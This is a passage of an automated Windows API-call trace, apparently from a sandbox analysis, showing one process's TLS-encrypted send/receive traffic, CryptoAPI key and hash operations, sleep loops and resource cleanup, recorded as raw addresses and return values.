pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.364] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.364] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.365] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.365] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.365] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.365] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.365] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.365] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.365] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.365] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.365] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.365] malloc (_Size=0x1fd) returned 0x3def010 [0146.365] free (_Block=0x0) [0146.365] free (_Block=0x3df00e0) [0146.365] free (_Block=0x3691270) [0146.365] free (_Block=0x3d81e60) [0146.365] malloc (_Size=0x1fd) returned 0x3d81e60 [0146.365] free (_Block=0x0) [0146.365] malloc (_Size=0x1fd) returned 0x3691270 [0146.365] free (_Block=0x0) [0146.365] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.365] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.366] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.367] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.367] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.367] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.367] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.367] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.367] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.367] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.367] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.367] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.367] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.367] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa2c*=0x10) returned 1 [0146.367] malloc (_Size=0x1fd) returned 0x3df00e0 [0146.367] free (_Block=0x0) [0146.367] free (_Block=0x3def010) [0146.367] free (_Block=0x3691270) [0146.367] free (_Block=0x3d81e60) [0146.367] malloc (_Size=0x202) returned 0x3d81e60 [0146.367] free (_Block=0x0) [0146.367] EncryptMessage (in: phContext=0x3d81944, fQOP=0x0, pMessage=0x339fa64, MessageSeqNo=0x0 | out: pMessage=0x339fa64) returned 0x0 [0146.368] send (s=0x5b0, buf=0x3689268*, len=543, flags=0) returned 543 [0146.368] free (_Block=0x3d81e60) [0146.368] free (_Block=0x605a18) [0146.368] free (_Block=0x3df00e0) [0146.368] Sleep (dwMilliseconds=0xa) [0146.524] Sleep (dwMilliseconds=0xa) [0146.888] Sleep (dwMilliseconds=0xa) [0146.997] Sleep (dwMilliseconds=0xa) [0147.379] Sleep (dwMilliseconds=0xa) [0147.544] Sleep (dwMilliseconds=0xa) [0147.670] Sleep (dwMilliseconds=0xa) [0147.875] Sleep (dwMilliseconds=0xa) [0148.147] Sleep (dwMilliseconds=0xa) [0148.251] Sleep (dwMilliseconds=0xa) [0148.366] Sleep (dwMilliseconds=0xa) [0148.487] Sleep (dwMilliseconds=0xa) [0148.578] Sleep (dwMilliseconds=0xa) [0148.712] Sleep (dwMilliseconds=0xa) [0148.895] Sleep (dwMilliseconds=0xa) [0149.001] Sleep (dwMilliseconds=0xa) [0149.141] Sleep (dwMilliseconds=0xa) [0149.542] Sleep (dwMilliseconds=0xa) [0149.643] Sleep (dwMilliseconds=0xa) [0149.773] Sleep (dwMilliseconds=0xa) [0149.938] Sleep (dwMilliseconds=0xa) [0150.086] Sleep (dwMilliseconds=0xa) [0150.190] Sleep (dwMilliseconds=0xa) [0150.316] Sleep (dwMilliseconds=0xa) [0150.424] Sleep (dwMilliseconds=0xa) [0150.514] Sleep (dwMilliseconds=0xa) [0150.617] Sleep (dwMilliseconds=0xa) [0150.705] Sleep (dwMilliseconds=0xa) [0150.945] Sleep (dwMilliseconds=0xa) [0151.039] Sleep (dwMilliseconds=0xa) [0151.130] Sleep (dwMilliseconds=0xa) [0151.226] Sleep (dwMilliseconds=0xa) [0151.323] Sleep (dwMilliseconds=0xa) [0151.475] Sleep (dwMilliseconds=0xa) [0151.577] Sleep (dwMilliseconds=0xa) [0151.680] Sleep (dwMilliseconds=0xa) [0151.764] Sleep (dwMilliseconds=0xa) [0152.069] free (_Block=0x3def210) [0152.069] malloc (_Size=0x1f7) returned 0x3d81e60 [0152.069] free (_Block=0x0) [0152.069] Sleep (dwMilliseconds=0xa) [0152.132] Sleep (dwMilliseconds=0xa) [0152.246] Sleep (dwMilliseconds=0xa) [0152.387] free (_Block=0x0) [0152.387] malloc (_Size=0x114) returned 0x3df04b8 [0152.388] free (_Block=0x0) [0152.388] free (_Block=0x3d81e60) [0152.388] free (_Block=0x3594d18) [0152.388] free (_Block=0x0) [0152.388] SetEvent (hEvent=0x558) returned 1 [0152.388] ApplyControlToken (phContext=0x3d81944, pInput=0x3d819a4) returned 0x0 [0152.390] InitializeSecurityContextA (in: phCredential=0x3d8193c, phContext=0x3d81944, pszTargetName=0x3648890, fContextReq=0xc11c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x3d81944, pOutput=0x3d819a4, pfContextAttr=0x3d819b4, ptsExpiry=0x0 | out: phNewContext=0x3d81944, pOutput=0x3d819a4, pfContextAttr=0x3d819b4, ptsExpiry=0x0) returned 0x0 [0152.393] send (s=0x5b0, buf=0x42bd78*, len=31, flags=0) returned 31 [0152.394] FreeContextBuffer (in: pvContextBuffer=0x42bd78 | out: pvContextBuffer=0x42bd78) returned 0x0 [0152.394] closesocket (s=0x5b0) returned 0 [0152.398] ApplyControlToken (phContext=0x3d81944, pInput=0x3d819a4) returned 0x0 [0152.399] InitializeSecurityContextA (in: phCredential=0x3d8193c, phContext=0x3d81944, pszTargetName=0x3648890, fContextReq=0xc11c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x3d81944, pOutput=0x3d819a4, pfContextAttr=0x3d819b4, ptsExpiry=0x0 | out: phNewContext=0x3d81944, pOutput=0x3d819a4, pfContextAttr=0x3d819b4, ptsExpiry=0x0) returned 0x0 [0152.399] send (s=0xffffffff, buf=0x42b560*, len=31, flags=0) returned -1 [0152.399] FreeContextBuffer (in: pvContextBuffer=0x42b560 | out: pvContextBuffer=0x42b560) returned 0x0 [0152.399] FreeCredentialsHandle (phCredential=0x3d8193c) returned 0x0 [0152.400] DeleteSecurityContext (phContext=0x3d81944) returned 0x0 [0152.401] free (_Block=0x3de7008) [0152.401] free (_Block=0x3689268) [0152.401] free (_Block=0x3648890) [0152.401] closesocket (s=0xffffffff) returned -1 [0152.401] free (_Block=0x0) [0152.401] free (_Block=0x3d81910) [0152.401] WaitForSingleObject (hHandle=0x380, dwMilliseconds=0xffffffff) returned 0x0 [0152.401] TerminateThread (hThread=0x380, dwExitCode=0x0) returned 1 [0152.402] CloseHandle (hObject=0x380) returned 1 [0152.402] free (_Block=0x3d80288) [0152.402] SetEvent (hEvent=0x558) returned 1 [0152.402] free (_Block=0x0) [0152.402] CryptDestroyKey (hKey=0x432af8) returned 1 [0152.403] free (_Block=0x606048) [0152.404] CryptDestroyHash (hHash=0x432a38) returned 1 [0152.404] CryptDestroyHash (hHash=0x432b78) returned 1 [0152.404] CryptDestroyKey (hKey=0x4328f8) returned 1 [0152.404] CryptDestroyKey (hKey=0x432778) returned 1 [0152.404] free (_Block=0x3594f20) [0152.404] free (_Block=0x36242b0) [0152.405] CryptDestroyKey (hKey=0x432bb8) returned 1 [0152.406] free (_Block=0x3624c18) [0152.406] CryptDestroyHash (hHash=0x432df8) returned 1 [0152.406] CryptDestroyHash (hHash=0x432938) returned 1 [0152.406] CryptDestroyKey (hKey=0x432c78) returned 1 [0152.406] CryptDestroyKey (hKey=0x432cf8) returned 1 [0152.406] free (_Block=0x60eec8) [0152.406] free (_Block=0x36241b0) [0152.406] CryptDestroyKey (hKey=0x4327f8) returned 1 [0152.408] free (_Block=0x36915b0) [0152.408] CryptDestroyHash (hHash=0x4329b8) returned 1 [0152.408] CryptDestroyHash (hHash=0x432978) returned 1 [0152.408] CryptDestroyKey (hKey=0x3e0e18) returned 1 [0152.408] CryptDestroyKey (hKey=0x3e1058) returned 1 [0152.408] free (_Block=0x36918f0) [0152.408] free (_Block=0x36243b0) [0152.408] SetEvent (hEvent=0x3a4) returned 1 [0152.408] SetEvent (hEvent=0x3a8) returned 1 [0152.408] free (_Block=0x3648dd0) [0152.408] free (_Block=0x3d802b0) [0152.408] CloseHandle (hObject=0x3a8) returned 1 [0152.408] CloseHandle (hObject=0x3a4) returned 1 [0152.408] free (_Block=0x3d9a988) [0152.408] free (_Block=0x0) [0152.408] CloseHandle (hObject=0x5cc) returned 1 [0152.408] CloseHandle (hObject=0x5c8) returned 1 [0152.409] free (_Block=0x0) [0152.409] free (_Block=0x3d66d30) [0152.409] free (_Block=0x0) [0152.409] free (_Block=0x3f4bfa8) [0152.409] free (_Block=0x3f65480) [0152.409] free (_Block=0x3f65320) [0152.409] free (_Block=0x3f4c028) [0152.409] free (_Block=0x60dd68) [0152.409] free (_Block=0x0) [0152.409] free (_Block=0x3df04b8) [0152.409] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x120) returned 0x40f518 [0152.409] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3fa038 | out: hHeap=0x3c0000) returned 1 [0152.409] GetLastError () returned 0x2736 [0152.409] SetLastError (dwErrCode=0x2736) [0152.409] CloseHandle (hObject=0x4b0) returned 1 [0152.410] FreeLibraryAndExitThread (hLibModule=0x320000, dwExitCode=0x0) [0152.410] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x40ee30 | out: hHeap=0x3c0000) returned 1 [0152.410] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x435f20 | out: hHeap=0x3c0000) returned 1 Thread: id = 39 os_tid = 0x5a8 [0134.762] SetEvent (hEvent=0x558) returned 1 [0134.764] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x80090318 [0134.764] recv (in: s=0x5b0, buf=0x3de7008, len=16413, flags=0 | out: buf=0x3de7008*) returned 543 [0135.747] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x0 [0135.747] malloc (_Size=0x1fd) returned 0x3d81e60 [0135.748] free (_Block=0x0) [0135.748] malloc (_Size=0x1fd) returned 0x3594d18 [0135.748] free (_Block=0x0) [0135.748] free (_Block=0x0) [0135.748] free (_Block=0x3d81e60) [0135.748] CryptImportKey (in: hProv=0x3e57b0, pbData=0x37df5b8, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x37df5b4 | out: phKey=0x37df5b4*=0x432bb8) returned 1 [0135.754] CryptExportKey (in: hKey=0x432bb8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x37df21c, pdwDataLen=0x37df204 | out: pbData=0x37df21c*, pdwDataLen=0x37df204*=0x90) returned 1 [0135.754] CryptExportKey (in: hKey=0x432bb8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x37df8e8, pdwDataLen=0x37df5ac | out: pbData=0x37df8e8*, pdwDataLen=0x37df5ac*=0x90) returned 1 [0135.754] malloc (_Size=0x80) returned 0x60a4f0 [0135.754] free (_Block=0x0) [0135.754] CryptDestroyKey (hKey=0x432bb8) returned 1 [0135.754] malloc (_Size=0x64) returned 0x60b2a0 [0135.754] free (_Block=0x0) [0135.754] malloc (_Size=0x80) returned 0x609ad8 [0135.754] free (_Block=0x0) [0135.754] malloc (_Size=0xc0) returned 0x3594f20 [0135.754] free (_Block=0x609ad8) [0135.754] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0135.754] CryptHashData (hHash=0x4327f8, pbData=0x3594f20, dwDataLen=0x81, dwFlags=0x0) returned 1 [0135.755] malloc (_Size=0x14) returned 0x3f652c0 [0135.755] free (_Block=0x0) [0135.755] CryptGetHashParam (in: hHash=0x4327f8, dwParam=0x2, pbData=0x3f652c0, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f652c0, pdwDataLen=0x37dfa34) returned 1 [0135.755] CryptDestroyHash (hHash=0x4327f8) returned 1 [0135.755] free (_Block=0x3f652c0) [0135.755] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0135.755] CryptHashData (hHash=0x4328f8, pbData=0x3594f20, dwDataLen=0x81, dwFlags=0x0) returned 1 [0135.755] malloc (_Size=0x14) returned 0x3f651e0 [0135.755] free (_Block=0x0) [0135.755] CryptGetHashParam (in: hHash=0x4328f8, dwParam=0x2, pbData=0x3f651e0, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f651e0, pdwDataLen=0x37dfa34) returned 1 [0135.755] CryptDestroyHash (hHash=0x4328f8) returned 1 [0135.755] free (_Block=0x3f651e0) [0135.755] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0135.755] CryptHashData (hHash=0x432d78, pbData=0x3594f20, dwDataLen=0x81, dwFlags=0x0) returned 1 [0135.755] malloc (_Size=0x14) returned 0x3f65360 [0135.755] free (_Block=0x0) [0135.756] CryptGetHashParam (in: hHash=0x432d78, dwParam=0x2, pbData=0x3f65360, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65360, pdwDataLen=0x37dfa34) returned 1 [0135.756] CryptDestroyHash (hHash=0x432d78) returned 1 [0135.756] free (_Block=0x3f65360) [0135.756] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0135.756] CryptHashData (hHash=0x4327f8, pbData=0x3594f20, dwDataLen=0x81, dwFlags=0x0) returned 1 [0135.756] malloc (_Size=0x14) returned 0x3f65440 [0135.756] free (_Block=0x0) [0135.756] CryptGetHashParam (in: hHash=0x4327f8, dwParam=0x2, pbData=0x3f65440, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65440, pdwDataLen=0x37dfa34) returned 1 [0135.756] CryptDestroyHash (hHash=0x4327f8) returned 1 [0135.756] free (_Block=0x3f65440) [0135.756] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0135.756] CryptHashData (hHash=0x432778, pbData=0x3594f20, dwDataLen=0x81, dwFlags=0x0) returned 1 [0135.756] malloc (_Size=0x14) returned 0x3f654e0 [0135.756] free (_Block=0x0) [0135.756] CryptGetHashParam (in: hHash=0x432778, dwParam=0x2, pbData=0x3f654e0, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f654e0, pdwDataLen=0x37dfa34) returned 1 [0135.756] CryptDestroyHash (hHash=0x432778) returned 1 [0135.756] free (_Block=0x3f654e0) [0135.756] free (_Block=0x3594f20) [0135.756] malloc (_Size=0x50) returned 0x3d9aca0 [0135.756] free (_Block=0x0) [0135.756] free (_Block=0x60b2a0) [0135.757] free (_Block=0x60a4f0) [0135.757] malloc (_Size=0xb8) returned 0x3594f20 [0135.757] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x3594fd0 | out: phHash=0x3594fd0) returned 1 [0135.757] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x3594fd4 | out: phHash=0x3594fd4) returned 1 [0135.757] CryptHashData (hHash=0x432b78, pbData=0x37dfa54, dwDataLen=0x14, dwFlags=0x0) returned 1 [0135.757] CryptHashData (hHash=0x432a38, pbData=0x37dfad4, dwDataLen=0x14, dwFlags=0x0) returned 1 [0135.757] CryptImportKey (in: hProv=0x3cf450, pbData=0x37dfa70, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x37dfa6c | out: phKey=0x37dfa6c*=0x432778) returned 1 [0135.757] CryptSetKeyParam (hKey=0x432778, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0135.757] CryptImportKey (in: hProv=0x3cf450, pbData=0x37dfa70, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x37dfa6c | out: phKey=0x37dfa6c*=0x4328f8) returned 1 [0135.757] CryptSetKeyParam (hKey=0x4328f8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0135.757] free (_Block=0x3d9aca0) [0135.757] malloc (_Size=0x10) returned 0x3648dd0 [0135.757] free (_Block=0x0) [0135.757] SetEvent (hEvent=0x3a4) returned 1 [0135.757] free (_Block=0x3594d18) [0135.757] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x80090318 [0135.757] recv (in: s=0x5b0, buf=0x3de7008, len=16413, flags=0 | out: buf=0x3de7008*) returned 543 [0137.286] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x0 [0137.287] malloc (_Size=0x1fd) returned 0x3594d18 [0137.287] free (_Block=0x0) [0137.288] malloc (_Size=0x1fd) returned 0x3d81e60 [0137.288] free (_Block=0x0) [0137.288] free (_Block=0x0) [0137.288] free (_Block=0x3594d18) [0137.288] malloc (_Size=0x1fd) returned 0x3594d18 [0137.288] free (_Block=0x0) [0137.288] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.289] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.289] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.289] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.289] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.289] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, 